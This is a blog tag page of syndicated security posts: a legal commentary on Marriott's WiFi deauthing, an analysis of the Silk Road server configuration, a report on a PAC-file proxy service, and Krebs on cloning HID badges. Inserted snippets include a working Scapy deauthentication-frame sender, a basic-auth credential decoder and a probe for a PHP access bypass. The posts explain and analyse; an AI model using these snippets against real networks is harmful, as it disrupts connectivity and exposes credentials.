Posts tagged ‘defcon’

Errata Security: Two Minutes of Hate: Marriott deauthing competing WiFi

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Do you stand for principle, even when it’s against your interests? Would you defend the free-speech rights of Nazis, for example? The answer is generally “no”; few people stand for principle. We see that in this morning’s news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use the hotel’s high-priced WiFi.

The principle I want to discuss here is “arbitrary and discriminatory enforcement”. It was the principle behind the Aaron Swartz and Andrew “weev” Auernheimer cases. The CFAA is a vague law under which it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was “unauthorized access”, but because they pissed off the powerful. Prosecutors then interpreted the law to suit their purposes.

The same thing is true in the Marriott case. Deauthing WiFi is common practice at large campuses everywhere: company headquarters, hospitals, and universities. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It’s also used at the DefCon conference, to prevent hostile access-points from tricking people by using “DefCon” in their name.

Section 333 of the Communications Act is vague on whether deauths are inherently illegal. That’s because they aren’t causing “interference” as the word is used in physics and radio communications. Indeed, if the access-point and the client simply ignored the deauth (which they can be configured to do), it would have no effect on the radio communications. (I configure my systems this way on pentests, by the way; it’s awesome.)
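
A deauth, for readers unfamiliar with the mechanics, is nothing more than a forged 802.11 management frame; no radio jamming is involved. As a rough sketch of what that means (my illustration, not part of the original post), here is how a single deauthentication frame can be built with the Scapy library. The MAC addresses and interface name are placeholders, and sending such frames against networks you don’t own may itself be unlawful.

from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

AP_MAC = "00:11:22:33:44:55"      # hypothetical access point (BSSID)
CLIENT_MAC = "66:77:88:99:aa:bb"  # hypothetical client

# addr1 = receiver, addr2 = transmitter, addr3 = BSSID. The frame claims to
# come from the AP and tells the client it has been deauthenticated.
frame = (RadioTap()
         / Dot11(addr1=CLIENT_MAC, addr2=AP_MAC, addr3=AP_MAC)
         / Dot11Deauth(reason=7))

# Requires a wireless interface in monitor mode. Clients and APs that use
# 802.11w (management frame protection) simply discard unauthenticated
# deauths like this one; that is the "ignore the deauth" configuration
# mentioned above.
sendp(frame, iface="wlan0mon", count=1, verbose=False)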

Marriott quite rightly defends itself by pointing out that there is nothing in the rules that distinguishes between the deauths everyone else is doing (which aren’t prosecuted by the FCC) and the deauths it was doing. Sure, they are shitty dirtbags for doing it, but there is nothing in the law that distinguishes between “shitty dirtbag deauth” and “cybersecurity deauth”.

In discussions on Twitter, I find that nobody cares about the principle of “discriminatory enforcement”. Instead, all they care about is that corporations are evil, and that Marriott was particularly evil in this instance. While nobody could explain what part of the law distinguishes permissible deauths from impermissible ones, they frequently argued why deauths can be thought of as violating section 333 of the Communications Act. That’s missing the point: if their interpretation of the law is correct, then all deauths need to be prosecuted by the FCC, and all makers of WiFi security products (Cisco, Aruba, etc.) need to be prosecuted for marketing jammers within the United States.

The point isn’t whether spoofing deauths is illegal. The point is “discriminatory enforcement”, and nobody seems to care, at least when it concerns those they already hate.


The phrase “two minutes of hate” refers to the Two Minutes Hate in George Orwell’s 1984. The outpouring of hate on my Twitter feed feels like that.

Errata Security: Reading the Silk Road configuration

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Many of us believe it wasn’t the FBI who discovered the hidden Silk Road server, but the NSA (or another intelligence organization). We believe the FBI is using “parallel construction”: creating a plausible story of how it found the server in order to satisfy the courts, but a story that isn’t true.

Today, Brian Krebs released data from the defense team that seems to confirm the “parallel construction” theory. I thought I’d write up a technical discussion of what was found.

The Tarbell declaration

A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server (“the Tarbell declaration”). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the “packet headers”.

Thirdly, he saved none of the forensics data. You’d have thought that, had this been real, he would have at least captured packet logs or even screenshots of what he did. I’m a technical blogger; I document this sort of thing all the time. It’s not hard for me, and it shouldn’t be hard for the FBI when it’s the cornerstone of the entire case.

Lastly, Tarbell doesn’t even deny it was parallel construction. A scenario of an NSA agent showing up at the FBI offices and opening a browser to the IP address fits within his description of events.

I am a foremost Internet expert on this sort of thing. I think Christopher Tarbell is lying.

The two servers involved

There were two servers involved.

The actual Tor “onion” server ran on a server in Germany at the IP address 65.75.246.20. This was the front-end server.

The Silk Road data was held on a back-end server in Iceland at the IP address 193.107.86.49. This is the server Tarbell claims to have found.

The data dumped today on Brian Krebs’ site is configuration and log files from the second server.

The Icelandic configuration

The Icelandic backend had two “sites”, one on HTTP (port 80) running the phpmyadmin pages, and a second on HTTPS (port 443) for communicating the Silk Road content to the German onion server.

The HTTP (port 80) site was configured to require “basic” authentication. Because of this, Tarbell could not have accessed the server on this port.

The thing to note, however, is that “basic” authentication over plain HTTP (port 80) sends the credentials across the wire effectively in the clear. If the NSA were monitoring links to/from Iceland, they could easily have discovered the password and used it to log onto the server. This is basic cybersecurity, the kind of thing the “Wall of Sheep” at DefCon is all about.
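
To see why that matters: HTTP “basic” authentication just base64-encodes the username and password into a header that rides along with every request, so anyone who can watch the port-80 traffic can recover the credentials. A minimal sketch, with a made-up header value:

import base64

# What a captured request might contain when basic auth is used over plain
# HTTP (the credentials here are invented for illustration):
#   Authorization: Basic YWRtaW46aHVudGVyMg==
header_value = "YWRtaW46aHVudGVyMg=="

username, password = base64.b64decode(header_value).decode().split(":", 1)
print(username, password)   # prints: admin hunter2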

Now consider the configuration of the HTTPS site.

Notice firstly that the “listen 443” directive specifies only a port number and not an IP address. Consequently, anybody on the Internet could connect to the server and obtain its SSL certificate, even though they would get nothing but an error message from the web server. Brian Krebs quotes Nicholas Weaver as claiming “This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server”. This is wrong; the web server accepts all TCP connections, though it may give a “403 Forbidden” as the result.

BTW: one plausible way of having discovered the server is to scan the entire Internet for SSL certificates, then correlate information in those certificates with the information found going across the Tor onion connection.
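
As a rough sketch of the per-host step of that idea (my illustration, using Python’s ssl module and the cryptography package rather than masscan itself): connect to port 443, pull the certificate without validating it, and look at what the certificate says about itself. The address below is a placeholder from the documentation range.

import ssl

from cryptography import x509   # pip install cryptography (recent versions)

def grab_cert_subject(ip, port=443):
    # Fetch the certificate in PEM form without validating it, then parse it.
    pem = ssl.get_server_certificate((ip, port))
    cert = x509.load_pem_x509_certificate(pem.encode())
    return cert.subject.rfc4514_string(), cert.issuer.rfc4514_string()

# Hypothetical usage against a placeholder address:
print(grab_cert_subject("192.0.2.10"))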

Next come the location rules, which allow only localhost and the German server, and then deny everything else (“deny all”). As mentioned above, this doesn’t prevent the TCP connection, but it does produce a “403 Forbidden” error code.

However, there is a flaw: this configuration is overridden for PHP files in the next section down. I’ve tested this on my own server. While non-PHP files are not accessible on the server, anything with the .php file extension still runs for everyone.

Worse yet, the login screen uses “/index.php”. The rules above convert an access of “/” automatically to “/index.php”. If indeed the server had the file “/var/www/market/public/index.php”, then Tarbell’s explanation starts to make sense. He’s still missing important details, and of course there is no log of him having accessed the server this way, but this demonstrates that something like his description isn’t impossible. One way this could have been found is by scanning the entire Internet for SSL servers, then searching for the string “Silkroad” in the resulting webpage.
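
Here is a sketch of how one might verify that kind of misconfiguration against a test server of one’s own (my illustration, not anything from the declaration or the defense filings). The host below is a placeholder: a static file should come back “403 Forbidden” under the deny-all rules, while “/” and “/index.php” should slip through and return “200”, and the returned login page can then be searched for an identifying string.

import requests
import urllib3

urllib3.disable_warnings()     # the hypothetical test box uses a self-signed cert

HOST = "https://192.0.2.10"    # placeholder address for a test server of your own

# Under the "deny all" location rules a static file should return 403, while
# "/" (rewritten to /index.php) and "/index.php" fall through to the PHP
# location block and return 200; the body can then be checked for a string.
for path in ("/style.css", "/", "/index.php"):
    r = requests.get(HOST + path, verify=False, timeout=10)
    print(path, r.status_code, "Silkroad" in r.text)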

The log files

The FBI imaged the server, including all the log files. Typical log entries looked like the following:

62.75.246.20 - - [14/Jul/2013:06:55:33 +0000] "GET /orders/cart HTTP/1.0" 200 49072 "http://silkroadvb5piz3r.onion/silkroad/item/0f81d52be7" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"

Since the defense could not find in the log files where Tarbell had accessed the system, the prosecutors helped them out by pointing to entries that looked like the following:

199.170.71.133 - - [11/Jun/2013:16:58:36 +0000] "GET / HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"

199.170.71.133 - - [11/Jun/2013:16:58:36 +0000] "GET /phpmyadmin.css.php?server=1&lang=en&collation_connection=utf8_general_ci&token=451ca1a827cda1c8e80d0c0876e29ecc&js_frame=right&nocache=3988383895 HTTP/1.1" 200 41724 "http://193.107.86.49/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"

However, these entries are wrong. First, they are for the phpmyadmin pages and not the Silk Road login pages, so they are clearly not the pages described in the Tarbell declaration. Second, they return “200 ok” as the status code instead of the “401 unauthorized” login error one would expect from the configuration. This means either the FBI knew the password, or the configuration had changed in the meantime, or something else is wrong with the evidence provided by the prosecutors.
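
For reference, here is a small sketch (mine, not the defense team’s methodology) of how one might sift a combined-format access log like the entries above for a given source address and see which status codes it received:

import re

# Matches the standard "combined" log format used in the entries above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

def hits_from(logfile, source_ip):
    # Yield (timestamp, request line, status code) for one source address.
    with open(logfile, encoding="utf-8", errors="replace") as f:
        for line in f:
            m = LOG_RE.match(line)
            if m and m.group("ip") == source_ip:
                yield m.group("time"), m.group("request"), m.group("status")

# Hypothetical usage: what did 199.170.71.133 request, and did it ever get a 401?
for when, request, status in hits_from("access.log", "199.170.71.133"):
    print(when, status, request)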

Conclusion

As an expert in such topics as sniffing passwords and masscanning the Internet, I know that tracking down the Silk Road site is well within the NSA’s capabilities. Looking at the configuration files, I can attest to the fact that the Dread Pirate Roberts sucked at op-sec.

As an expert, I know the Tarbell declaration is gibberish. As an expert reading the configuration and logs, I know that they don’t match the Tarbell declaration. That’s not to say that the Tarbell declaration has been disproven; it’s just that “parallel construction” is a better explanation for what’s going on than Tarbell actually having found the Silk Road server on his own.

TorrentFreak: The Art of Unblocking Websites Without Committing Crimes

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The blocking of sites such as The Pirate Bay, KickassTorrents and Torrentz in the UK led to users discovering new ways to circumvent ISP-imposed censorship. There are plenty of solutions, from Tor and VPNs, to services with a stated aim of unblocking ‘pirate’ sites deemed illegal by UK courts.

Last month, however, dozens of these went offline when the operator of Immunicity and other related proxy services was arrested by City of London Police’s Intellectual Property Crime Unit. He now faces several charges, including breaches of the Serious Crime Act 2007, Possession of Articles for Use in Fraud, Making or Supplying Articles for Use in Frauds, and money laundering.

While it’s generally accepted that running a site like The Pirate Bay is likely to attract police attention, merely unblocking a domain was not thought to carry any such risk. After all, visitors to torrent sites are just that: visitors. It’s only later on that they make a decision to infringe or not.

In our earlier article we discussed some of the possible reasons why the police might view “pirate” proxies as illegal. However, there are very good arguments that general purpose proxies, even ones that are expressly set up to bypass filtering (and are able to unblock sites such as The Pirate Bay), remain on a decent legal footing.

One such site is being operated by Gareth, a developer and networking guru who grew so tired of creeping Internet censorship he began lobbying UK MPs on the topic, later moving on to assist with the creation of the Open Rights Group’s Blocked.org.uk.

After campaigning and documenting Internet censorship issues for some time, Gareth first heard of last month’s proxy arrest during a visit to the United States.

“I was at DefCon in Las Vegas when the news of the Immunicity arrest reached me and I realized that for all my volunteer work, my open source applications, operation of Tor relays, donations and letters to MPs to highlight/combat the issues with Internet censorship, it was not enough,” the developer told TorrentFreak.

“I felt that this issue has moved from a political / technical issue to one about personal liberty and Internet freedom. e.g. first they came for the ‘pirate proxies’, then the Tor operators, then the ISPs that don’t censor their customers. The slippery slope is becoming a scary precipice.”

Since his return to the UK, Gareth has been busy creating his own independent anti-censorship tool. He’s researched in detail what happened to Immunicity, taken legal advice, and is now offering what he hopes is an entirely legal solution to website filtering and subsequent over-blocking.

“Unlike Immunicity et al I’m not specifically building a ‘Pirate Proxy’. Granted people might use this proxy to navigate to torrent websites but were I to sell a laptop on eBay that same person may use it for the same reasons so I see no difference,” he explains.

“In fact Section 44, subsection 2 of the Serious Crimes Act 2007 even states [that an individual] is not to be taken to have intended to encourage or assist the commission of an offense merely because such encouragement or assistance was a foreseeable consequence of his act.”

The result of Gareth’s labor is the anti-censorship service Routing Packets is Not a Crime (RPINAC). People who used Immunicity in the past should feel at home, since RPINAC also utilizes the ability of popular browsers to use Proxy Auto-Config (PAC) files.

In the space of a couple of minutes and with no specialist knowledge, users can easily create their own PAC files covering any blocked site they like. Once configured, their browser will silently unblock them.

Furthermore, each PAC file has its own dedicated URL on RPINAC’s servers which users can revisit in order to add additional URLs for unblocking. PAC ‘unblock’ files can also be shared among like-minded people.
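
For the curious, a PAC file is just a small JavaScript function that the browser calls for every URL it loads. The sketch below (my illustration, not RPINAC’s actual code) generates one that routes a couple of placeholder domains through a proxy and sends everything else direct; the proxy address and domains are also placeholders.

PAC_TEMPLATE = """function FindProxyForURL(url, host) {{
    var blocked = [{hosts}];
    for (var i = 0; i < blocked.length; i++) {{
        if (dnsDomainIs(host, blocked[i])) {{
            return "PROXY {proxy}";
        }}
    }}
    return "DIRECT";
}}
"""

def make_pac(domains, proxy="proxy.example.net:8080"):
    # Quote each domain for the JavaScript array and fill in the template.
    quoted = ", ".join('"%s"' % d for d in domains)
    return PAC_TEMPLATE.format(hosts=quoted, proxy=proxy)

# Illustrative domains standing in for sites blocked by UK court order.
print(make_pac(["thepiratebay.example", "kickasstorrents.example"]))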

“When someone creates a PAC file they are redirected to a /view/ endpoint e.g. https://routingpacketsisnotacrime.uk/view/b718ce9b276bc2f10af90fe1d5b33c0d. This URL is not ephemeral, you can email it, tweet it (there is a tweet button on the left hand side of the site) etc and it will provide the recipient with the exact same view.

“It’ll show which URLs are specified to be proxied, which have been detected as blocked (using the https://blocked.org.uk database) and if the author passed along the password (assuming the PAC was password protected) they can add or remove URLs too,” Gareth explains.

“Each view page also has a comments section, this could allow for a small collection of individuals to co-ordinate with a smaller subset of password possessing moderators to create a crowd sourced PAC file in an autonomous fashion. There is also a ‘Clone’ button allowing anybody to create their own copy of the PAC file with their own name, description and password if the PAC file they’ve received isn’t quite what they need.”

This user-generated element of the process is important. While dedicated ‘pirate’ proxy sites specifically unblock sites already deemed illegal by the UK courts (and so can be seen as facilitating their ‘crimes’), RPINAC leaves the decision of which sites to unblock entirely up to the user. And since no High Court injunction forbids any user from accessing a blocked domain, both service and user remain on the right side of the law.

In terms of use, RPINAC is unobtrusive, has no popups, promotions or advertising, and will not ask for payment or donations, a further important legal point.

“To avoid any accusations of fraud and to avoid any tax implications RPINAC will never ask for donations,” the dev explains. “The current platform is pre-paid for at least a year, the domain for 10. At a bare minimum PAC file serving and education for creating local proxies will continue indefinitely.”

Finally, Gareth notes that without free and open source software his anti-censorship platform wouldn’t have been possible. So, in return, he has plans to release the source code for the project under the GPL 3.0 license.

RoutingPacketsIsNotACrime can be found here and is compatible with Firefox, Chrome, Safari and IE. Additional information can be sourced here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to an employee of the targeted organization and asking for directions, a light for a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security.  HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data, called radio-frequency identification or RFID, can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.